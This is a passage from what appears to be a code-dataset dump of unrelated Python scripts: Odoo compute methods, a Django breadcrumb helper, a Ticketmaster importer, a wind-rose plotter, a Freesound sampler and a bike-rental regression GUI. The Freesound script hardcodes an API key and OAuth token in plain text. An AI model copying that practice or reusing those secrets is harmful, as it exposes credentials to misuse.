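    def _compute_count_contract(self):
        for rec in self:
            rec.count_contract = self.env['srdc.contract'].search_count(
                [('partner_id', '=', rec.id)])

    def _compute_count_project(self):
        for rec in self:
            rec.count_project = self.env['project.project'].search_count(
                [('partner_id', '=', rec.id)])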
and -1 or 0)\n stack = request.session.get('stack', [])\n if len(stack) >= back:\n while back:\n stack.pop()\n back -= 1\n request.session.save()\n title, url = stack[-1]\n else:\n url = request.get_full_path()\n\n if request.is_ajax():\n return HttpResponse(url)\n else:\n return HttpResponseRedirect(url)\n\n","sub_path":"ui/components/breadcrumbs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"465200904","text":"from django.utils import timezone\nfrom datetime import datetime, timedelta\nimport requests\nimport json\nimport logging\nfrom lmn.keys import keys\nimport psycopg2\nimport os\nimport urllib.parse as urlparse\n\n\ntry:\n\n url = os.environ['DATABASE_URL']\n p_url = urlparse.urlparse(url)\n dbname = p_url.path[1:]\n user = p_url.username\n password = p_url.password\n\n\n db = psycopg2.connect(database=dbname, user=user, password=password, host=p_url.hostname, port=p_url.port)\n #db = psycopg2.connect(database='lmnop', user='lmnop', password=os.environ['POSTGRES_LMNOP_USER_PASSWORD'])\n cur = db.cursor()\n\n # start the daily task of adding events to database from ticketmaster.\n base_url = 'https://app.ticketmaster.com/discovery/v2/events.json?apikey={}&startDateTime={}&endDateTime={}&stateCode=MN'\n\n key = keys['TM_KEY']\n\n # getting time and formatting it for ticketmaster.\n time = datetime.utcnow()\n start_time = time + timedelta(days=1) - timedelta(hours=5)\n final_start = start_time.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end_time = time + timedelta(days=2) - timedelta(hours=5)\n final_end = end_time.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n print(final_start)\n print(final_end)\n\n\n url = base_url.format(key,final_start,final_end)\n\n response = requests.get(url)\n\n tm_json = response.json()\n\n #print(tm_json)\n\n\n\n show_list = dict()\n\n try:\n\n artist = tm_json[\"_embedded\"]['events']\n\n\n # Loop over json and pull relevant info.\n for entry in artist:\n for place in entry[\"_embedded\"]['venues']:\n for performer in entry[\"_embedded\"]['attractions']:\n\n artist = ''\n\n #oddly I found that not every show has a attraction name.\n try:\n artist = performer['name']\n\n except Exception as e:\n artist = entry['name']\n\n location = place['name']\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n\n if not venue_rows:\n\n city = place['city']['name']\n print(location)\n print(city)\n\n query = 'INSERT INTO lmn_venue (name,city,state) VALUES (%s,%s,%s)'\n cur.execute(query, (location, city, 'MN'))\n db.commit()\n\n day = entry[\"dates\"][\"start\"][\"localDate\"]\n time = entry[\"dates\"][\"start\"][\"localTime\"]\n\n date_time = day + \" \" + time\n\n venue_list = []\n\n venue_list.append(location)\n venue_list.append(date_time)\n\n show_list[artist] = venue_list\n\n\n #print(show_list)\n\n value_list = []\n\n # loop over created dictionary and add show/artist to database.\n for key, value in show_list.items():\n\n name = key\n value_list = show_list[key]\n location = value_list[0]\n date = value_list[1]\n print(date)\n\n cur.execute('SELECT * FROM lmn_artist WHERE name=%s', (name,))\n artist_rows = cur.fetchall()\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n\n artist_id = 0\n venue_id = 0\n\n #check if artist is in database.\n if not artist_rows:\n\n query = 'INSERT INTO lmn_artist (name) VALUES (%s)'\n cur.execute(query, (name,))\n 
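In httprr above, `back = abs(url == '..' and -1 or 0)` is an obscured 1-or-0, and when the session stack is empty `len(stack) >= back` still holds for back == 0, so `stack[-1]` raises IndexError. A clearer, guarded rewrite of that branch as a helper:

def resolve_back_url(request, url):
    """Replacement for httprr's '.'/'..' branch: never indexes an
    empty stack and spells out the 1-or-0 step count."""
    steps_back = 1 if url == '..' else 0
    stack = request.session.get('stack', [])
    for _ in range(min(steps_back, len(stack))):
        stack.pop()
    request.session.save()
    if stack:
        _title, target = stack[-1]
        return target
    return request.get_full_path()    # empty stack: stay put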
db.commit()\n\n #need to get artist ID to enter show information.\n cur.execute('SELECT * FROM lmn_artist WHERE name=%s', (name,))\n artist_rows = cur.fetchall()\n artist_id = artist_rows[0][0]\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n venue_id = venue_rows[0][0]\n\n # print(artist_id)\n # print(venue_id)\n\n #check if show has been created.\n cur.execute('SELECT * FROM lmn_show WHERE show_date=%s AND artist_id=%s AND venue_id=%s', (date,artist_id,venue_id,))\n event_rows = cur.fetchall()\n\n if not event_rows:\n\n query = 'INSERT INTO lmn_show (show_date,artist_id,venue_id) VALUES (%s,%s,%s)'\n cur.execute(query, (date, artist_id, venue_id))\n db.commit()\n\n cur.execute('SELECT * FROM lmn_show')\n event_rows = cur.fetchall()\n\n except Exception as e:\n\n logging.exception(\"Problem!\")\n\nexcept Exception as e:\n logging.exception('problem connecting toi database.')\n","sub_path":"LMNOPproject/fetch_ticketmaster_each_day.py","file_name":"fetch_ticketmaster_each_day.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"645432093","text":"#!/usr/bin/env python\n#\n# (C) Copyright 2014 UIO.\n#\n# This software is licensed under the terms of the Apache Licence Version 2.0\n# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. \n# \n# \n# Creation: July 2017 - Anne Fouilloux - University of Oslo\n#\n# Usage:\n#\n#./test_read.py --inputdir=$PWD\n\nimport os\nfrom optparse import OptionParser\nimport os.path\nimport glob\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport windrose as wr\nimport matplotlib.ticker as plticker\n\ndef mkdir_p(file):\n if file != \"\" and file != \".\":\n path = os.path.dirname(file)\n try:\n os.stat(path)\n except:\n os.makedirs(path)\n\ndef main():\n usage = \"\"\"usage: %prog --inputdir=input_directory [--outputdir=output_directory] \"\"\"\n\n parser = OptionParser(usage=usage)\n parser.add_option(\"-s\", \"--inputdir\", dest=\"inputdir\",\n help=\"root directory for reading input files\", metavar=\"inputdir\" )\n\n parser.add_option(\"--outputdir\", dest=\"outputdir\",\n help=\"root directory for storing output files\", metavar=\"outputdir\")\n\n (options, args) = parser.parse_args()\n\n if not options.inputdir:\n parser.error(\"Input directory where files to read are located must be specified!\")\n else:\n inputdir=options.inputdir\n\n\n if not options.outputdir:\n# if WORKDIR is defined, we will use it otherwise files \n# will be stored in the current directory\n outputdir=os.environ.get(\"WORKDIR\",\".\")\n else:\n outputdir=options.outputdir\n\n#Define which filename\n filenames = glob.glob(inputdir+\"/\"+'met_mast_w*.txt')\n np_array_list = []\n for filename in filenames:\n print(filename)\n df = pd.read_csv(filename,sep=\";\",names=['station_id','date','direction','speed']) \n df['date'] = pd.to_datetime(df['date'], errors='coerce')\n df = df.dropna(subset=['date'])\n df = df.dropna(subset=['direction'])\n df= df.dropna(subset=['speed'])\n\n np_array_list.append(df.as_matrix())\n\n comb_np_array = np.vstack(np_array_list)\n big_frame = pd.DataFrame(comb_np_array)\n\n big_frame.columns = ['station_id','date','direction','speed']\n big_frame['date']= pd.to_datetime(big_frame['date'])\n big_frame['station_id']= big_frame['station_id'].astype(str)\n big_frame['direction']= big_frame['direction'].astype('float64')\n big_frame['speed']= 
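The SELECT-then-INSERT-then-SELECT pattern repeated through the Ticketmaster record above is racy and verbose; on PostgreSQL the "create if missing, return the id" step can be one statement. A sketch; it assumes a UNIQUE constraint on lmn_artist.name, which the record's schema does not show:

def get_or_create_artist(cur, name):
    """Single round-trip upsert; requires UNIQUE(name) on lmn_artist."""
    cur.execute(
        "INSERT INTO lmn_artist (name) VALUES (%s) "
        "ON CONFLICT (name) DO NOTHING RETURNING id",
        (name,),
    )
    row = cur.fetchone()
    if row is None:                    # already existed: look up its id
        cur.execute("SELECT id FROM lmn_artist WHERE name = %s", (name,))
        row = cur.fetchone()
    return row[0]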
big_frame['speed'].astype('float64')\n big_frame.index = big_frame['date']\n del big_frame['date']\n\n\n# Calm conditions\n calm = 0.5\n\n# Remove too small wind speed values!\n big_frame=big_frame.loc[(big_frame['speed'] > calm )]\n\n w_H = big_frame.loc[big_frame['station_id'] == '18210 (506)'] \n w_B = big_frame.loc[big_frame['station_id'] == '18700 (506)'] \n\n\n plt.hist([0, 1])\n plt.close()\n\n#A quick way to create new windrose axes...\n def new_axes():\n \tfig = plt.figure(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='w')\n \trect = [0.1, 0.1, 0.8, 0.8]\n \tax = wr.WindroseAxes(fig, rect, axisbg='w')\n \tfig.add_axes(ax)\n \treturn ax\n\n outfilename='eklima_rose_Hovin_10MIN_25.png'\n ax = new_axes()\n ax.bar(w_H['direction'], w_H['speed'], opening=0.8, edgecolor='white', bins=np.arange(0.5, 15, 2))\n plt.title('Hovin - OBS - 25m', y=1.08, fontsize=16, fontweight='bold')\n #locc = plticker.MultipleLocator(base=500.0) # this locator puts ticks at regular intervals\n #ax.xaxis.set_major_locator(locc)\n ax.set_xlim(0,2500)\n ax.set_ylim(0,2500)\n ax.yaxis.set_ticks(np.arange(0,2500,500))\n ax.yaxis.set_ticklabels(np.arange(0,2500,500))\n ax.set_legend()\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.3), title='Value [m/s]', fontsize=10)\n plt.savefig(outfilename)\n\n outfilename2='eklima_rose_Blindern_10MIN_26.png'\n ax2 = new_axes()\n ax2.bar(w_B['direction'], w_B['speed'], opening=0.8, edgecolor='white', bins=np.arange(0.5, 15, 2))\n plt.title('Blinder - OBS - 26.5m', y=1.08, fontsize=16, fontweight='bold')\n ax2.set_ylim(0,2500)\n ax2.set_xlim(0,2500)\n ax2.yaxis.set_ticks(np.arange(0,2500,500))\n ax2.yaxis.set_ticklabels(np.arange(0,2500,500))\n ax2.set_legend()\n ax2.legend(loc='center left', bbox_to_anchor=(1, 0.3), title='Value [m/s]', fontsize=10)\n plt.savefig(outfilename2)\n\n\n #plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"eklima_windrose_10MIN.py","file_name":"eklima_windrose_10MIN.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"7318089","text":"# fs sampler\n# version: 0.1\n# Dieses Programm dient dazu anhand von spezifischen Parametern aus der online Library Free Sound Dateien zu selektieren und diese in ein Verzeichnis lokal runter zu laden\n\nfrom __future__ import print_function\nimport freesound\nimport os\nimport sys\nfrom oauthlib.oauth2 import BackendApplicationClient\nfrom requests_oauthlib import OAuth2Session\nimport hashlib\nimport random\nimport time\nimport subprocess\n\n# OSC\nfrom osc4py3.as_eventloop import *\nfrom osc4py3 import oscmethod as osm\n\nclass config():\n\t\"\"\"\n\tStart here to edit your config of the program\n\t\"\"\"\n\tAPIKEY=\"Ld15pPetuu7VMVOGEzgkrvTp23IaiplOUmuszK44\"\n\tOAUTHTOKEN=\"VegqtgKdHqbR0KwcElFha5FvC2vhhQ\"\n\tFETCHDIRNAME = \"fetchedSounds\"\n\tCOUNT = 10 #Maximale Anzahl der Sounds (-1 für unbegrenzt)\n\tPAGESIZE = 300 #Ergebnisse pro Abruf von Freesounds INT (Seitenbasiert, Seite n kann spezifiziert werden)\n\tDEBUG = True\n\tMINSOUNDDURATION = 1\n\tMAXSOUNDDURATION = 30\n\nclass fsFetcher():\n\tdef __init__(self):\n\t\tself.fsClient = freesound.FreesoundClient()\n\t\tself.fsClient.set_token(config.APIKEY)\n\t\t#programm status (True = weiter arbeiten, False = Fehler)\n\t\tself.state = False\n\n\tdef createDirs(self):\n\t\tself.path_name = os.path.join(os.getcwd(), config.FETCHDIRNAME)\n\t\tif config.DEBUG:\n\t\t\tprint (\"directory path:\")\n\t\t\tprint(self.path_name)\n\t\ttry:\n\t\t\tif 
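df.as_matrix() in the wind-rose record above was removed in pandas 1.0, and stacking frames through NumPy throws away the dtypes the script then restores by hand. The same loading loop with pd.concat:

import glob
import pandas as pd

inputdir = "."   # the record's --inputdir option

frames = []
for filename in glob.glob(inputdir + "/met_mast_w*.txt"):
    df = pd.read_csv(filename, sep=";",
                     names=["station_id", "date", "direction", "speed"])
    df["date"] = pd.to_datetime(df["date"], errors="coerce")
    df = df.dropna(subset=["date", "direction", "speed"])
    frames.append(df)

big_frame = pd.concat(frames, ignore_index=True)   # keeps column dtypes
big_frame = big_frame.set_index("date")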
config.DEBUG:\n\t\t\t\tprint(\"creating dir for previews...\")\n\t\t\tos.mkdir(self.path_name)\n\t\texcept (FileExistsError):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dir already created, skipping\")\n\t\texcept:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"cannot create folder: \"+self.path_name+\" ! Cannot continue\")\n\t\t\treturn False\n\t\ttry:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"creating dir for wave files...\")\n\t\t\tos.mkdir(self.path_name+'/wav')\n\t\texcept (FileExistsError):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dir already created, skipping\")\n\t\texcept:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"cannot create folder: \"+self.path_name+\"/wav ! Cannot continue\")\n\t\t\treturn False\n\t\tself.state = True\n\t\treturn True\n\n\tdef md5(self,fname):\n\t hash_md5 = hashlib.md5()\n\t with open(fname, \"rb\") as f:\n\t for chunk in iter(lambda: f.read(4096), b\"\"):\n\t hash_md5.update(chunk)\n\t return hash_md5.hexdigest()\t\n\n\tdef selectSounds(self, minDuration=config.MINSOUNDDURATION, maxDuration=config.MAXSOUNDDURATION, geo=[-10,52,4000]):\n\t\t\"\"\"\n\t\tDiese Methode wählt Sounds aufgrund folgender Parameter aus der Freesound Library\n\t\tParameter: minimale Dauer, maximale Dauer, Geotags: Breitengrad, Längengrad, Entfernung (Radius) als INT\n\t\t\t\t\n\t\tText Search Request:\n >>> sounds = c.text_search(\n >>> query=\"dubstep\", filter=\"tag:loop\", fields=\"id,name,url\"\n >>> )\n >>> for snd in sounds: print snd.name\n\n\t\tGeotag Filter:\n\t\t\t#filter={!geofilt sfield=geotag pt=, d=}\n\t\t\"\"\"\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tif config.DEBUG:\n\t\t\tprint (\"fetching sound data from freesounds\")\n\t\t\tprint (\"geotags:\")\n\t\t\tprint (geo)\n\t\tsoundGeoTagging = geo\n\t\tstart = time.time()\n\t\tqueryFilter = \"{{!geofilt sfield=geotag pt={0},{1} d={2}}}\".format(geo[0],geo[1],geo[2])\n\t\t#queryFilter = \"type:wav {!geofilt sfield=geotag pt=13,52 d=2000}\"\n\t\tqueryFields =\"id,name,duration,md5,type,previews\"\n\t\tsounds = self.fsClient.text_search(filter=queryFilter,fields=queryFields, page_size=config.PAGESIZE)\n\t\tstop = time.time()\n\t\tif config.DEBUG:\n\t\t\tprint (\"dauer für freesounds abruf: \")\n\t\t\tprint (stop-start)\n\t\treturn self.filterByDuration(sounds, minDuration, maxDuration)\n\n\tdef downloadSounds(self, soundsObject):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\t#self.fsClient.set_token(config.OAUTHTOKEN, \"oauth\")\n\t\t\"\"\"\n\t\tDownload Sound Files\n\t\tErwartet ein Sound Objekt mit einer Liste von Sounds\n\t\t\"\"\"\n\t\ti = 0\n\t\tfor sound in soundsObject:\n\t\t\tif (i >= 0) & (i < config.COUNT):\n\t\t\t\tself.nameFileByIndex(sound, i)\n\t\t\t\t#filename = \"sound_\"+str(i)+\".wav\"\n\t\t\t\t#sound.retrieve_preview(self.path_name, name=filename)\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\treturn\n\t\treturn\n\tdef nameFileByIndex(self, soundObject, i):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tfilename = \"sound_\"+str(i)\n\t\tif config.DEBUG:\n\t\t\tprint(\"\\t\\tDownloading:\", soundObject.name)\n\t\t\tprint(\"as: \"+filename)\n\t\tsoundObject.retrieve_preview(self.path_name, name=filename)\n\t\t\"\"\"\n\t\tLoglevel ffmpeg\n\t\t\t-loglevel [repeat+]loglevel | -v [repeat+]loglevel\n\t\t\tSet the logging level used by the library.\n\t\t\t‘quiet, -8’\n\t\t\tShow nothing at all; be silent.\n\t\t\t‘panic, 0’\n\t\t\tOnly show fatal errors which could lead the process to crash, such as an assertion failure. This is not currently used for anything.\n\t\t\t‘fatal, 8’\n\t\t\tOnly show fatal errors. 
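createDirs above needs two try/except blocks only because os.mkdir refuses existing directories; os.makedirs with exist_ok=True creates the whole chain idempotently. An equivalent sketch:

import os

def create_dirs(fetch_dir="fetchedSounds"):
    """Create the preview dir and its wav/ subdir; no-op if present."""
    path_name = os.path.join(os.getcwd(), fetch_dir)
    try:
        os.makedirs(os.path.join(path_name, "wav"), exist_ok=True)
    except OSError as e:
        print("cannot create folders under", path_name, ":", e)
        return None
    return path_name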
These are errors after which the process absolutely cannot continue.\n\t\t\t‘error, 16’\n\t\t\tShow all errors, including ones which can be recovered from.\n\t\t\t‘warning, 24’\n\t\t\tShow all warnings and errors. Any message related to possibly incorrect or unexpected events will be shown.\n\t\t\t‘info, 32’\n\t\t\tShow informative messages during processing. This is in addition to warnings and errors. This is the default value.\n\t\t\t‘verbose, 40’\n\t\t\tSame as info, except more verbose.\n\t\t\t‘debug, 48’\n\t\t\tShow everything, including debugging information.\n\t\t\t‘trace, 56’\n\t\t\"\"\"\n\t\tsubprocess.call(['ffmpeg','-v', 'warning', '-y', '-i', self.path_name+'/'+filename,self.path_name+'/wav/'+filename+'.wav'])\n\t\treturn\n\n\tdef nameFileByName(self, soundObject):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tfullfilepath = self.path_name+\"/\"+soundObject.name\n\t\tif (os.path.isfile(fullfilepath)):\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"dateiname vorhanden: \"+soundObject.name)\n\t\telse:\n\t\t\tif config.DEBUG:\n\t\t\t\tprint (\"datei muss geladen werden:\")\n\t\t\t\tprint(\"\\t\\tDownloading:\", soundObject.name)\n\t\t\t#if sound.name.endswith(sound.type):\n\t\t\tfilename = soundObject.name\n\t\t\tsoundObject.retrieve_preview(self.path_name, name=filename)\n\t\t\t#else:\n\t\t\t#\tfilename = \"%s.%s\" % (sound.name, sound.type)\n\t\t\t#\tsound.retrieve_preview(self.path_name, name=filename)\n\t\treturn\n\n\tdef filterByDuration(self, soundsObject, minDuration, maxDuration):\n\t\tif not (self.state):\n\t\t\treturn False\n\t\tsounds = soundsObject\n\t\tsoundList = []\n\t\ttmp = time.time()\n\t\tfor sound in sounds:\n\t\t\tsoundList += [sound]\n\t\trandom.shuffle(soundList)\n\t\tfilteredObjects = []\n\t\ti = 0\n\t\tif config.DEBUG:\n\t\t\tprint (\"dauer für shuffle: \")\n\t\t\tprint (time.time()-tmp)\n\t\t\tprint (\"Preselected Sounds:\")\n\t\t\tprint (soundList)\n\t\tfor sound in soundList:\n\t\t\tif (i >= 0) & (i < config.COUNT):\n\t\t\t\tif (int(sound.duration) >= minDuration) & (int(sound.duration) <= maxDuration):\n\t\t\t\t\tfilteredObjects += [sound]\n\t\t\t\t\ti += 1\n\t\tif config.DEBUG:\n\t\t\tprint (\"selected sounds after filtering:\")\n\t\t\tprint (filteredObjects)\n\t\treturn filteredObjects\n\nclass OSCListener():\n\tdef __init__(self):\n\t\tself.serverip = \"127.0.0.1\"\n\t\tself.port = 12005\n\t\t#Programaufruf\n\t\tself.soundFetcher = fsFetcher()\n\t\tself.soundFetcher.createDirs()\n\tdef handlerForWLR(self, x, y, z):\n\t\t# Will receive message data unpacked in x,yz\n\t\t# Koordignatenaufruf, Download\n\t\tsounds = self.soundFetcher.selectSounds(geo=[x,y,z])\n\t\tdownload = self.soundFetcher.downloadSounds(sounds)\n\n\n\tdef startup(self):\n\t\t# Start the system.\n\t\tif config.DEBUG:\n\t\t\tprint(\"starting up Server...\")\n\t\tosc_startup()\n\n\t\t# Make server channels to receive packets.\n\t\tosc_udp_server(self.serverip, self.port, \"aservername\")\n\n\t\t# Associate Python functions with message address patterns, using default\n\t\t# argument scheme OSCARG_DATAUNPACK.\n\t\tosc_method(\"/incommingWLR*\", self.handlerForWLR)\n\t\tif config.DEBUG:\n\t\t\tprint(\"listening...\")\n\n\tdef shutdown(self):\n\t\tosc_terminate()\n\n\tdef listenLoop(self):\n\t\t# Periodically call osc4py3 processing method in your event loop.\n\t\tfinished = False\n\t\ttry:\n\t\t\twhile not finished:\n\t\t\t\tosc_process()\n\t\texcept KeyboardInterrupt:\n\t\t\t# Properly close the system.\n\t\t\tfinished = True\n\t\t\tself.shutdown()\n\t\t\tpass\n\t\texcept Exception as 
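filterByDuration above keeps walking the whole shuffled list after COUNT matches have been found, because the `(i >= 0) & (i < config.COUNT)` test never breaks the loop. The same selection with an explicit break and an ordinary chained comparison:

import random

def filter_by_duration(sounds, min_duration, max_duration, count):
    """Return up to `count` randomly chosen sounds inside the window."""
    pool = list(sounds)
    random.shuffle(pool)
    selected = []
    for sound in pool:
        if min_duration <= sound.duration <= max_duration:
            selected.append(sound)
            if len(selected) == count:
                break            # stop scanning once we have enough
    return selected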
e:\n\t\t\tself.shutdown()\n\t\t\tprint (e)\n\t\n\nappStart = time.time()\n\nserver = OSCListener()\nserver.startup()\nserver.listenLoop()\n\nappStop = time.time()\nprint (\"App runtime: \")\nprint (appStop - appStart)\n","sub_path":"py/newPy5/fsSampler (5).py","file_name":"fsSampler (5).py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"311152875","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tkinter as tk \nfrom tkinter import messagebox,simpledialog,filedialog\nfrom tkinter import *\nimport tkinter\nfrom imutils import paths\nfrom tkinter.filedialog import askopenfilename\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split,KFold,cross_val_score,GridSearchCV\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import RandomForestRegressor\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[2]:\n\n\nroot= tk.Tk() \nroot.title(\"Bike renting analysis\")\nroot.geometry(\"1300x1200\")\n\n\n# In[ ]:\n\n\nglobal df_hour, df_day\ndef upload_data1():\n global df_hour\n df_hour = askopenfilename(initialdir = \"Dataset\")\n #pathlabel.config(text=train_data)\n text.insert(END,\"Dataset loaded\\n\\n\")\n \ndef upload_data2():\n global df_day\n text.delete('1.0',END)\n df_day = askopenfilename(initialdir = \"Dataset\")\n #pathlabel1.config(text=test_data)\n text.insert(END,\"New Dataset loaded\\n\\n\")\n \ndef data():\n global df_hour,df_day,df\n text.delete('1.0',END)\n df_hour = pd.read_csv(\"hour.csv\")\n df_day = pd.read_csv(\"day.csv\")\n df_hour.drop('instant',axis=1,inplace=True)\n df=pd.merge(df_day,df_hour,how='left',left_on='dteday',right_on='dteday')\n text.insert(END,\"Top FIVE rows of the Dataset\\n\\n\")\n text.insert(END,df.head())\n text.insert(END,\"column names\\n\\n\")\n text.insert(END,df.columns)\n text.insert(END,\"Total no. 
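listenLoop above polls osc_process() in a tight while loop, which pins a CPU core while idle. osc4py3's as_eventloop scheme expects exactly this polling, but a short sleep keeps it cheap; a sketch that also guarantees the socket is released:

import time
from osc4py3.as_eventloop import osc_process, osc_terminate

def listen_loop():
    try:
        while True:
            osc_process()        # drain pending OSC packets
            time.sleep(0.01)     # ~100 Hz poll instead of a busy spin
    except KeyboardInterrupt:
        pass
    finally:
        osc_terminate()          # always release the UDP socket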
of rows and coulmns\\n\\n\")\n text.insert(END,df.shape)\ndef statistics():\n text.delete('1.0',END)\n text.insert(END,\"Top FIVE rows of the Dataset\\n\\n\")\n text.insert(END,df.head())\n stats=df.describe()\n text.insert(END,\"\\n\\nStatistical Measurements for Data\\n\\n\")\n text.insert(END,stats)\n null=df.isnull().sum()\n text.insert(END,null) \ndef train_test():\n text.delete('1.0',END)\n global x,y\n global x_train,x_test,y_train,y_test\n text.delete('1.0',END)\n x=df.drop(['dteday','cnt_y'],axis=1)\n y=df['cnt_y']\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=25)\n text.insert(END,\"Train and Test model Generated\\n\\n\")\n text.insert(END,\"Total Dataset Size : \"+str(len(df))+\"\\n\")\n text.insert(END,\"Training Size : \"+str(len(x_train))+\"\\n\")\n text.insert(END,\"Test Size : \"+str(len(x_test))+\"\\n\")\n return x_train,x_test,y_train,y_test \n\ndef LR():\n text.delete('1.0',END)\n lm=LinearRegression()\n lm.fit(x_train,y_train)\n predictions=lm.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"prediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"LRprediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \n \ndef KNN():\n text.delete('1.0',END)\n regressor = KNeighborsRegressor()\n regressor.fit(x_train, y_train)\n predictions = regressor.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"KNNprediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"prediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \ndef RFT():\n text.delete('1.0',END)\n global new_x_test,new_x_train,y_train\n \n regressor = RandomForestRegressor(max_depth=5,n_estimators = 10, random_state = 
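In LR above, `res['season_x'] = x['season_x']` pairs prediction row k with row k of the full feature table instead of the k-th test sample, because res carries a fresh 0..n-1 index while x keeps the original one. Building the result frame on x_test's own index keeps rows aligned; x_train, x_test, y_train, y_test are the splits produced earlier in the record:

import pandas as pd
from sklearn.linear_model import LinearRegression

lm = LinearRegression().fit(x_train, y_train)
predictions = lm.predict(x_test)

# Index the results by the test rows so later assignments line up.
res = pd.DataFrame({"predictions": predictions}, index=x_test.index)
res["season_x"] = x_test["season_x"]   # same rows, by construction
res["actual"] = y_test
res.to_csv("LRprediction_results.csv")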
0)\n regressor.fit(x_train, y_train)\n features = pd.DataFrame()\n features['Feature'] = x_train.columns\n features['Importance'] = regressor.feature_importances_\n features.sort_values(by=['Importance'], ascending=False, inplace=True)\n features.set_index('Feature', inplace=True)\n text.insert(END,\"Selected Important Features Automatically by using *feature_importances_* & *SelectFromModel*\\n\\n\")\n text.insert(END,features[:3])\n selector = SelectFromModel(regressor, prefit=True)\n train_reduced = selector.transform(x_train)\n new_x_train=pd.DataFrame(train_reduced,columns=['registered_y','casual_y'])\n test_reduced = selector.transform(x_test)\n new_x_test=pd.DataFrame(test_reduced,columns=['registered_y','casual_y'])\n #new_reduced=selector.transform(New_data)\n #new_data=pd.DataFrame(new_reduced,columns=['registered_y','casual_y','casual_x'])\n parameters = {'bootstrap': False,\n 'min_samples_leaf': 3,\n 'n_estimators': 10,\n 'min_samples_split': 6,\n 'max_features': 'sqrt',\n 'max_depth': 5}\n\n rf = RandomForestRegressor(**parameters)\n rf.fit(new_x_train, y_train)\n predictions=rf.predict(new_x_test)\n \n \n \n res = pd.DataFrame(predictions)\n res.to_csv(\"prediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"RFTprediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n text.insert(END,\"Error Rate 